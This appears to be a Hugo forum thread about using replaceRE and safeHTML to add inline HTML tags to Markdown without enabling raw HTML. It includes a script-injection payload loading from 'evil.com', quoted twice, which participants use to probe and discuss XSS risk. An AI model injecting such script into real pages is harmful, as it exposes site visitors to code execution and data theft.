Get missing inline HTML tags in Markdown without enabling HTML

Georg · August 27, 2022, 12:54pm

Hi,

Goldmark lacks formatting signs for a few inline HTML tags. We can enable HTML to use them in our Markdown, but this is not a good solution, where security should be a concern — e.g. for themes or larger projects with many contributors. The site configuration parameter unsafe should be left in its default state unsafe = false.

In the last few month, I’ve found the following replacements very useful to inject some missing HTML tags after Goldmark has rendered the HTML. So far, there was no interference with other Markdown elements, shortcodes or attributes. The syntax dates back to a suggestion @jmooring made somewhere in this forum.

Every element is surrounded by the curly braces { and }. A special ASCII sign after the first brace indicates the replacement.

{^1} → 1
{_2} → 2
{#Key} → <kbd>Key</kbd>
{$variable} → <var>variable</var>
{!highlight} → highlight
{=Author} → <cite>Author</cite>
{+inserted} → <ins>inserted</ins>

These substitutions can be applied with Hugo’s replaceRE. I chained them together in one partial, which is called with .Content as input: {{ partial "content.html" .Content }}.

content.html:

{{
.
| replaceRE `\{\^([^}]*)\}` "<sup>$1</sup>"
| replaceRE `\{\_([^}]*)\}` "<sub>$1</sub>"
| replaceRE `\{\#([^}]*)\}` "<kbd>$1</kbd>"
| replaceRE `\{\!([^}]*)\}` "<mark>$1</mark>"
| replaceRE `\{\=([^}]*)\}` "<cite>$1</cite>"
| replaceRE `\{\+([^}]*)\}` "<ins>$1</ins>"
| replaceRE `\{\$([^}]*)\}` "<var>$1</var>"
| safeHTML }}

Stay safe,
Georg

P.S.: After @salim pointed out a possible loophole in this approach, I changed the regex patterns to exclude angled brackets.

But this was not necessary, as the clarifying discussion here has shown. So now the template is again as it has been at first, but now I know better how it works.

loupbrun · August 29, 2022, 2:34pm

Handy, thanks for the tip!

salim · September 1, 2022, 9:10pm

By relying on safeHTML like this, you’re essentially “enabling HTML”, I guess:

It should not be used for HTML from a third-party, or HTML with unclosed tags or comments.

I can use your substitution mechanism to insert arbitrary HTML:

{#<script src='https://evil.com'></script><script>nasty();</script>}

Georg · September 1, 2022, 9:39pm

Wow, thanks, looks like you’re right. This is the opposite of what I did hope to achieve. But these replacements do not work without safeHTML. Maybe we need to enhance the regex to exclude angled brackets. Would that do the trick?

salim · September 2, 2022, 11:38am

Would that do the trick?

I’m really no expert regarding XSS and stuff.

Generally, you should really know what you’re doing when declaring user input as safeHTML, i.e. sanitize it properly. I don’t know if simply blocking angle brackets is enough… I guess OWASP’s XSS Filter Evasion Cheat Sheet is a good starting point, see e.g. section Character Escape Sequences.

Georg · September 2, 2022, 12:20pm

I played around a little more with these regular expressions and noticed something odd. Hugo already seems to filter all tags when evaluating replaceRE.

Did you test your script attack with a recent Hugo version? Because I can’t get a tag through when using my original regex code.

jmooring · September 2, 2022, 3:40pm

With this in site configuration^[1]:

[markup.goldmark.renderer]
unsafe = true

This markdown:

{#<script src='https://evil.com'></script><script>nasty();</script>}

With your original regex code, produces:

<p><kbd><script src='https://evil.com'></script><script>nasty();</script></kbd></p>

With your new regex code, produces:

<p>{#<script src='https://evil.com'></script><script>nasty();</script>}</p>

Never a good idea unless you completely trust content authors. ↩︎

Georg · September 2, 2022, 4:32pm

Thanks, @jmooring, I haven’t tested this before. These replacements are meant to be used with the default configuration unsafe = false. Maybe the template should check this setting and issue an error or a warning? It wouldn’t make much sense to use these replacements and also allow for raw HTML.

And I have a question now, concerning Hugo’s workflow:
My impression is, Hugo uses its raw HTML check when unsafe = false after all content has been rendered and every replaceRE could have been run. Am I right about this? Then I could remove the check for the angled brackets again and rely on Hugo’s security check. This works on my installation, but I don’t know how far this nice feature dates back.

jmooring · September 2, 2022, 4:40pm

The unsafe = true/false configuration value sets the value of the yuin/goldmark html.WithUnsafe renderer option. Any manipulation of .Content occurs after goldmark has rendered the markdown to HTML.

Georg · September 2, 2022, 4:50pm

Thanks again, then the steps are the other way around. With unsafe = false (default) Goldmark omits all HTML tags before replaceRE does its work. And I can rely on that check.

And with unsafe = true an attack doesn’t need replacements to embed script code. They can be placed anywhere like the inline tags. If raw HTML is enabled these replacements are of no use.

jmooring · September 2, 2022, 4:59pm

Which is why, if a site or theme author is ever tempted to do this…

[markup.goldmark.renderer]
unsafe = true

…they should find another way.

tut · September 3, 2022, 6:39am

I was following the discussion since I have used the cite option extensively in my pages in the last two days. So, good to know it is all good.

system · September 5, 2022, 6:40am

This topic was automatically closed 2 days after the last reply. New replies are no longer allowed.

Topic		Replies	Views
replaceRE markdown with html, then render safely support	3	294	January 23, 2024
Goldmark (CommonMark compliant) is now merged and the new default Announcements	22	4827	January 19, 2020
Adding styling to text blocks without using inline HTML support	4	764	November 8, 2020
Goldmark breaks shortcode support	1	1323	December 11, 2019
Inline quotes with backsticks/<code> support	10	994	September 11, 2022

Get missing inline HTML tags in Markdown without enabling HTML

Related topics